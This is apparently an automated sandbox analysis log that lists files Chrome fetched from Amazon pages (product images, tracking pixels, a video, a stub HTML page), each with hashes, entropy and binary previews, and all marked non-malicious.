                                                                                                                                                                                                                                                                      SHA-256:EEBC05F1C6805700CE3C52C4AD78790647006F8BABCB1AB379E51F1DCD162729
                                                                                                                                                                                                                                                                      SHA-512:3BBFFFF0CC126D0B35B7D46F2BC91B03DBA8ABEEAAFDE5A9CAB04256F0387458EB940B1744EC72F972CD975387025C3A8245E19E55B347041607032ADC5ADA58
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71YXfRqyg3L._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!..1A."Q.246qrst.......#3RTUu.....$5BSa...b...%CDc...................................................1!.."2A.3Qr...S..#4BRaq................?.V...F..56eE.\.GOW$..A+F.ys.6[nw8..MU.....J..CS!$.@".p.....Rf...]].Kg`..f}.G{......lm.j'.'.#..d.d..#.,gA.c........wh...1._<..j.+!..BG=.^A*C.U.B.P./._.8...z.3......H.St.*d.....r.O..e5j.5.K.8t%)R...Y.wP.....{...((...hr.....;....p.Lm.S....%or.....^._x....K...\.A.}d.J..Q+;..*..rI.v...:A`|.j...X.}..#..ce.. ..2\...)../^....:9.TZ..J........rG...NY.g.|..!..z..t.. ..%......6.!.?n...:..d..n...:..d.....Lz.56....z..0..y.]...dI0....<..U.L.[...<..U.L.[.c.Q.......K...v}.YzJ.SI... ...|+.......\..W.2}lO.\..W.2}lz.7fzfhL.... .)c_.B......Ju...&A<)F..S......z..a.u.?9.~.'...u.z.....~.......)..........G
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1x1, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):285
                                                                                                                                                                                                                                                                      Entropy (8bit):3.992477276923708
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:6:7hHx7qC0o26Z+aW6Hri/aliltjDtqRXhP/lYYms9:7vTtRWPtsh/lz
                                                                                                                                                                                                                                                                      MD5:B1DF542B3846358E48A00920727A87EB
                                                                                                                                                                                                                                                                      SHA1:B3E8EE8554DA24238553747F8B2656739AD00FFD
                                                                                                                                                                                                                                                                      SHA-256:733E9DF98B6072B548E0D75DDAE41F62B4EB20996D3C06588B78D9963F57DB94
                                                                                                                                                                                                                                                                      SHA-512:3281B4C63BBADB693CC73281197675FCC8FBCB0671DE59C6F525C054C19EF274EC6738E872559FB077758406C7982E478C3B9F6D3C30A73DAF0E1716220C94F2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/G/01/msa/vowels/metrics.jpg?time=1724264950405&rand=949678
                                                                                                                                                                                                                                                                      Preview:......JFIF.............C..............................................!........."$".$.......C............................................................................"............................................................................................................?...$..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:SX0TR1HXR3TVBG1JQK3B$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295396.0%26id%3DSX0TR1HXR3TVBG1JQK3B%26ctb%3D1%26m%3D1%26sc%3DSX0TR1HXR3TVBG1JQK3B%26pc%3D12262%26at%3D12262%26t%3D1724264979102%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D11601212031%26tid%3DSX0TR1HXR3TVBG1JQK3B%26aftb%3D1%26ui%3D2%26lob%3D1:12261
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 250x250, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):9962
                                                                                                                                                                                                                                                                      Entropy (8bit):7.958302140755193
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:L+gbx4jCul1esQuZ7wK8SkGZJozflTnIHp+JLHy11OXLl0TdERl39lk01sui:L+gnkS47wbSkGZqlgp+Jo1wupEf3z716
                                                                                                                                                                                                                                                                      MD5:C399636513BEC53300E2D2AA48838273
                                                                                                                                                                                                                                                                      SHA1:16DBAC1F178F1B46C4EE513A9684A504F78865D0
                                                                                                                                                                                                                                                                      SHA-256:D7DBCD02D499B10A79CF14ECC060F56D4BBFD58E7F96290BF95F40B13D395269
                                                                                                                                                                                                                                                                      SHA-512:62503294C4BA583DA22D77DBB281EB8010B7AE555053EF967FF4BAED2FCFDEE09843FE7B64A470745DCAE56D5F9B07824518ADBA8EABFE18514BD66AA68BCF0B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/51qJO2LBrzL._AC_SR250,250_QL65_.jpg"
                                                                                                                                                                                                                                                                      Preview:......JFIF.........................!.....+....'...'.''.#'##,'!!',#');)0+5,)8););::=BC;'BZ..........!8'.,:0.)E:C,:=::+L:C8:#;:,55,,0)0:,==;.+=8'Q+,':8B5'=H..........."...............................................................!1."AQ.2aq..#Brs....$4R...35CS...b...%t..................................................!1.."2Aq..#Qa..34B............?...Pu,..@..[E...U.9.?w.?h<.,o..Fg@....,..9....Jh...Q..C.Dp...(....F.N..p.....4e.4...O.Zdc.].{.38C'x/..o.K:."..Q..b...&N).e...&.V8.............oM?Sm..$.*..2..#......#k...........2?.F...JF7..=.].K;....d@.n...?..c4.L....f...mUe}..f...u....1x.....*.........{E...."...u...Z.e...k...n:........\K.h.,.Olc..........GZY.....M....yu\QS..>...S.9.........i..?....nSw4x.q..&.9_.'.Z.l.N...o.7..B.....U.y......NB..;.!....".B..A.B!.!....".B..D.+.N.7.,.'..N..X.?....&....E.kGyN...G{..B.......Z........Gr|.\.._.zP.%s..94.v.&.:9.....X.VW0..2..1..94U..nF.\.bF.c.hs....o{....w....L..2.1...%..5,]N...........]e..OQ..#....f3..V....A....:....x.5.....E
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):71
                                                                                                                                                                                                                                                                      Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                      MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                      SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                      SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                      SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 263x320, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):28380
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9784362196622345
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:IHldih5yIBdp6RpRWOpD6MaLa3fEYIO293YQJFE/FkbshrVQKOPE20H6ieodrhWC:IFcR+r3/3HIOzrLy+sodo4pGtY
                                                                                                                                                                                                                                                                      MD5:87A49E3446408AA4D0E1155F2D4F6188
                                                                                                                                                                                                                                                                      SHA1:088B989206803505B2BDBD2CD17066206C89E6BC
                                                                                                                                                                                                                                                                      SHA-256:1F8BFBE30CEF9E4E7D04F031C406BF066A4D08550DCABBEBEC4F8441C6FC9EEA
                                                                                                                                                                                                                                                                      SHA-512:87A5675292EE5C75C6BFACFE53A8441A136983CB8D9069F2B2E9AB0CDAFBA3DA18DAD83FFA20D19D6C797B5436C3E805A0579DDE48A06B3C2C62384880707585
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........5..................................................................[.>.OE7F.h..cV...z,..i.c'v.....-...M...!. Zp`.........=./b.z....X..'.!...\X.;../w..#.y.q..C..h....n..,.}.qL..D.%B...h.@....0.....|".[%..wF.d.K......Z...4x...[.....`.N.G* .}.X..?6.h[.......kE...gv$@{^..M^9!tz..U...x..9.I~.\!...k.....)....)....,..-H.2J.......Y.&....V?..j......ik.}.s0V. .Z.f....u......^gcsT.M-...2.....U1^Tu.......W%5w...~.m...F.....^.;....J.%.....k.2.(._......z/.-`.:....=hRw*7@...7.......pW.\=[)..../*....-...a>."..1...'$c..b....s.z..d.,.A...6...X.T..... .Q..Sn.b.\D.]......g.p.c....ny:..H...n.\........f.(.ZX....]5...'.(...\I=..t.!.'..l.....".OM.N...;8VTv5.S[...(..U.p...\.n...0...9}....t.=.aD...x....;tv..:...o.Y...w.sX.".n...@.6x.Z....Y...9.......ak.....B.I....o........K...NO.*.}..XvmH....|.a
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x314, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):23618
                                                                                                                                                                                                                                                                      Entropy (8bit):7.967671292793069
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:oh4yHX0hI8ZLVrJPqXoClF0ojUpM0p86O+65le7sLBsPx5Ac:fmXQ9LBJ0oy0CW+66qiC
                                                                                                                                                                                                                                                                      MD5:5EBCB775D6E2C3354BA66C13A2C316AF
                                                                                                                                                                                                                                                                      SHA1:7F6E066EA807D2A1B2EA201D07EB6DFDABA05F82
                                                                                                                                                                                                                                                                      SHA-256:BC6B852261CACF956106096D0157290A7E6523AC86787EEEECF477ED33540763
                                                                                                                                                                                                                                                                      SHA-512:78357E30D3E44BC6F542E371961436124901CDEA98B292D692944165273F3FDF1D79ADE082305CE398752FE2CFFE1E7F6D89A0F2947446CEFC18D3358FEFDC52
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......:.@.."..........5....................................................................M].....'HYP....2|.....S.6...>...|.\.k:..j..O.[0.@........}^.|.......Kh......8.<.}.h\..s.^(j..]`c7..B.~.U...j.V.~..........fK.f.TK..XY...F.)...].k.!......Pm4.O...{c].%.....2..~.......W...L.6c.!a.....|.5...M...I.T3..;...u..."WZ{.Y............-.C)diU.....R.~.v.SM...../J,^.F.....^...\.,.R.....(...B.fF..q...>..Cs...l.Kn..&..j..+G:........|.a...`.....h6.\.H...g]..u...=.R.NM..m.WV/...e.wq[...=NY3.W.>}..xy......jX.M.q3.+..j..U...R..0..bWb.v...D.-O6yS..-usX..K...:...caW.b-}.-.j2tr.,6).y`...DO..#~............@...j...]x.].oI............z...8.R.%.N..)Q.I...J....yN\....'8.5N.c%/v{[.L.Z..Q..c&.P~+.LF..1.T..d...:...!.cu3A...,.z.>k4o.....u.r...U)E...sy.cZ.t......! ...........%1.=..5X...*....[..C.,ko.....c....s..=.A.\..u.6.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x307, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):23553
                                                                                                                                                                                                                                                                      Entropy (8bit):7.961040887697002
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:uyI9yYxaMMJGGIgg6uJqwb6ZDu6oQu4cLmNmdSDOVmyMZOknGe1z1XYRHuI895z:uxVnGlgJqc6ZDu6ZVcLmAdSq/KjVnOvs
                                                                                                                                                                                                                                                                      MD5:71CB15C3B6364151FCFD467631F8BABA
                                                                                                                                                                                                                                                                      SHA1:5AB84C35E98A51CA025FAD7BDA7E3A4C0169AD3C
                                                                                                                                                                                                                                                                      SHA-256:641BC106A0E8CBD6B3AEA74D971A24CD2386429B78E4D616C3122367C079B094
                                                                                                                                                                                                                                                                      SHA-512:1431FC5E88EEA7691DCD701E8D0486175BE86205B2B7DECFB1451B2E728C6C1B9FB74EC92B5402630E531456246A565EEE86AD3F97740C27C6C720417EADFBFC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71xQ06a-1ZL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......3.@.."..........6................................................................................r...sI..A.r....G..]W.gOx..Q..-.:`.P.~..(..x..w.......@..........>.O..2=......v.&..<{J...^L.l.s.DE........4...........na.,..u.j...\.,..K.=.....y...{"b....)mpUo.6..V.v..gQ.wkq...=.T.6.x.,.N.U.n&RZ...Z).f..N!.......G..A..N..A:.'.dC.Ks!.M..ffd...z.T...F.Q.s.[.....-&..}s7QIq<x...5Z..yfr`7.T\.%..y..9.]zP=s"..@..-FF....L|.G{.........1..B...w......-....<tG....t..QL.8.D.............!.Y........%Q....^...Y.....#.m.g...}[.,..KsuL....|.r76y6..o.?;~...tlt.H...:^.....V..{....}.f.[b.n^....#...\d...$..W+..ySc.'.>....._8.iN...9.........X.Nb.P.oe......C.......rnr....V$..".J....k..].uy).0... .~...\.e.v.a.gw6...7:~..eO~...oP^..zUj#Nm.g.WvUo{[3.=.Y...):..d.#....... .........5.&6.....'...R.OZ."..b..v..Y.P........[QcYXu..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 640x360, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):16438
                                                                                                                                                                                                                                                                      Entropy (8bit):7.820012070513804
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:HsXiAKLyQ8h8Sm6xVwfNj+3jt5BzOWZQMd0A8XBWF:H4iS8swijt36OHKA0WF
                                                                                                                                                                                                                                                                      MD5:639FB25C08B87DCD9141FCA44AB152CD
                                                                                                                                                                                                                                                                      SHA1:32BA5D4E5F8ED31F84A7FB38B5E0CAEBAD572B3B
                                                                                                                                                                                                                                                                      SHA-256:2FC5F3FC712FF3704D15D9117290B371E02573E8A382CA8717C32EF9D1885307
                                                                                                                                                                                                                                                                      SHA-512:4A0B8640E2E3EABD034C7D34EBF5DCE4DDBB769CD9738253566FF1F702C623B4BC3ADE33C373177B3868EF2A23429419447BBF413E273F30DEB945EDB97AA8AE
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF...................................................%...#... ,!#&')*)..-1-(0%))(...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......h...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(....Q@.(.AE.P0..(...(...(...(...(...(...(...(...(...(.....~8Y..E..+}.}.k7.:..7..... #...aM7.i..#..}G.*.Ey...B.3Gi.m........j..5h....Ep.%3..Q.....SA3\]D.....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 440x350, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):41291
                                                                                                                                                                                                                                                                      Entropy (8bit):7.971978756424162
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:o88w/jLEHJ8I4nP7uZcz2D/A2Kew8P7UudiRVKW6GvJk3CHIOlakea:o8FLEHJ74nPKZcaDYNzc9eKWrk3GlD5
                                                                                                                                                                                                                                                                      MD5:FA95E832520DA9AA5B65A6EE6118B176
                                                                                                                                                                                                                                                                      SHA1:64A5A48876364001262F0B196002D772A5A755A9
                                                                                                                                                                                                                                                                      SHA-256:CB1BD1FC7A2AC7290AB76EF589931327658E87C7CEF18170311FF392F504B18E
                                                                                                                                                                                                                                                                      SHA-512:45D287076C2EBD71DAC6FB7C1CA37418B881EC936BDB675D3D0E8E9C5A1B8C382A127A70F065C6BEFE11D2E5887533FE91AF7720A0805778AB6C671E3B858B04
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF.............C............................................!!$$!!0///06666666666...C............................."......". ... .%%""%%//,//6666666666......^....".......................................I........................!.1A."Q.a.2q.#B..R.....$3.br.CSs..%&4....'c....................................7......................!1.A.Qaq"...2......#B..Rb....34............?...o;.H..j...<^.....:W..~s.T}G...v.7..D.8..8.....w......@$...d.P .D.6(....tX.......2...........e@=.q..q..8....>s..[.&.X.q.*I....).A........$.LE..&.iM..Lm.3... .y...._.3....=.O9R.h.p-(.......@..X.8}...uw.@....*..#..o$..J...y.../...P...nk..qEF..?..X..4..$l...|..........T.=....-i;..D........S..a...q.C].v.....(5...fF..'....P.7....|..$2.........:.n.O..:.}..py.(A...&..C....G...#.....bh...8*......-l.4.\.DQ.u...o....F...a/b.v.n.7.A.`....Go..... .......&..c....d....I.L\......<.O..-.I.I..._.".9b.i.:.(oP(..Q....Q.9zT.Q.c...I.......%cz.S^..O......./.+{...?s.}...:.B..r%......_.A...Q._.u......D.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 166x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):8450
                                                                                                                                                                                                                                                                      Entropy (8bit):7.945529762230963
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:5LMlEnAudhqhw0vj9nIGO32ahSJiT0ggUI9SECqRxr8rqdTs:alYrdhqhZ9nI12diT0ggN5Lr8r2Ts
                                                                                                                                                                                                                                                                      MD5:1BDE0A4A4866677EC342B4C052722F26
                                                                                                                                                                                                                                                                      SHA1:82455E2E2818940B13A1A6C6993FB35930AE84F7
                                                                                                                                                                                                                                                                      SHA-256:DADE747D9EDA5A04729F6F7F6505461E4CD2EDA40EEA91A9D036DAEF1519FB1A
                                                                                                                                                                                                                                                                      SHA-512:24DCCF1F171BE25104695453343673BDC0D5401A941ADEC23310128B35F5D4834159EEB0FE78D4A2272CC3B604039EC531D807D83BDD5B5ED94FC189BE82A8E5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/61gfdNg8jyL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..................................................................!.12AUq......"#34QS...$6RTastu....%5Br....C...7bc...d.................................................1..!2R.."Aa3BQq..#...r..............?............V....$.4.."Q...f.j.}.7...vn.~./.Q~..g.M.u.J..:...t{.jo._z...Q@]}.7...vn...Z..W.7n.TP._t.M..]..G.V.......U....+Sx...f....u}.v....$1XZ.r.nR..f....p>..]...l.hF.%...,.....7...vn...Z..W.7n.>ob.../......z@..u.j.c....H..q7...|.....u}.v..J..:...uX...s5...A*.c..'.U`.1./v.A.W2G.Y..y.B....,v.......:X#..]8.X...;&.ve.(w...x...r.am.......O)P...0Z.V..{..e..qm:.p..)..H..v..AY*^..RK.K.i.h.M............}3W}.o.~.32..gU..*..4.F...{[<.....<..(./.....}?......=.B....$.X..y..Y...6.cU.|V7.X..\...F.NY....V..^..~..K.U..q..%.3...G..p.7.yO>U.b.Mq.1wW.s.o..H..~..C....N.....j)m .B.=.Nh.w....!.<
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ISO Media, Apple iTunes Video (.M4V) Video
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):233152
                                                                                                                                                                                                                                                                      Entropy (8bit):7.729857771261382
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:6144:uLF+KIlBrVl/iS7nPig0b4bsyekds+vc1o6:s+Bpl/xnKg0bIYkdnUp
                                                                                                                                                                                                                                                                      MD5:044B9770389800D5D7BF166BC02D23A2
                                                                                                                                                                                                                                                                      SHA1:03852F853F91C602F1F6D0393F6668BC62DA2321
                                                                                                                                                                                                                                                                      SHA-256:0BE4727D243201EDCDF31EE106EB20E442E30E2B4D0161ED9D0414CFE2965F38
                                                                                                                                                                                                                                                                      SHA-512:D29AB0AAF2B5F196AED8DBF408E938BB99CF00CD2C576AED4AA3F40C70E88769BD253732589BA3D5DDCAEEC38AF5ABA013832F0445D93B5EF7D374DE99C10729
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/S/al-eu-726f4d26-7fdb/97ee0417-4861-45cc-b71a-9f99ff1cb3ba.mp4/productVideoOptimized.mp4:2f7ecbfffd5100:0
                                                                                                                                                                                                                                                                      Preview:....ftypM4V ....isomavc1mp42..c.moov...lmvhd.....?...?........x.................................................@..................................!iods.......O..)................$.trak...\tkhd.....?...?............w.................................................@........h....#.mdia... mdhd.....?...?....a...cPU......<hdlr........vide............ETI ISO Video Media Handler...#Kminf....vmhd...............$dinf....dref............url ......#.stbl....stsd............avc1...........................h.H...H.........Elemental H.264........................pasp...........AavcC.B.....*'B...B.@_..(@@@P.............................(. ....btrt..pQ............stts...........2.......$stss...............U............... cslg...........................(stsc.......................2............stsz...........2..c*...............=......._...2...2...6...............{.......'.......`...r...e..&....T...................S...............X.......?.......z...................m...............................,..."
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 440x350, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):41545
                                                                                                                                                                                                                                                                      Entropy (8bit):7.973287047196714
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:3kkgA51OXYIk+UIafFPXzFAc4NguInuhmXgnXDkpn1PkOLtfVHSr2:3Fr0oIk+I9PXz6W7nMmXgnXDkpn1PkuV
                                                                                                                                                                                                                                                                      MD5:5E8C49CC487C896E10683C06E55DEA9A
                                                                                                                                                                                                                                                                      SHA1:97AB9DE18DAB7B1D8A01E106EDB9CC23536B92BF
                                                                                                                                                                                                                                                                      SHA-256:1A85B9317C61C15F11A1CA68F4B221C75905B975E2DAB9A011EAB1221EBD70E3
                                                                                                                                                                                                                                                                      SHA-512:5B229DFCB2A75880443A3CAEE6D0558F360131D1E89610400D0C053661BF148B441EFDDE36CD2447124E21E51379468CF90BF4C4E8A0B62A0AB5A4BA71BD3B23
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF.............C............................................!!$$!!0///06666666666...C............................."......". ... .%%""%%//,//6666666666......^...."........................................O........................!1.A.."Qa2q....#BR...3.$b..CSr.....6st...%57c.&4d...................................6.....................!1..AQ.aq......"2..BR..3..#br..............?...o.z.\.....)..^ j1...@.Y..c5.9.12DN..-....k...VYU...I.R..........Ut..~.#mB...9o..`#.....+.).P|.R.P.....0s3F.X..W<.:...........5.J....&....<..$...O.ImW.;]...c"GuL.M..iX.<...VK-..%.=..C.]....:...5..da........!......MO.e..b....G...be...:..f....b.)^.D...ir$$.....M. ..R..^W.;.%..d(.6B..?...>c+4q.`.(...&..H..R....#f2...c.)au.c..%N.P6....?.....%.....]....A._..A.......L...s..].x..Q2...@4...D.N.a.......j@...'z8..0,:.y<.g.{6.Y|.".!&..*X..[....V.H..Uv.F...{o..$..y..Yg.FwL..W.Z=;...)....R.3..,E.e..cA...'...8.$......Pnd.?.:.A{..(..?|{.N../..@.......|..%_5..I.):..@1....{.......([;j7.....Y
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                      MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                      SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                      SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                      SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (562)
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):93236
                                                                                                                                                                                                                                                                      Entropy (8bit):5.397125859693619
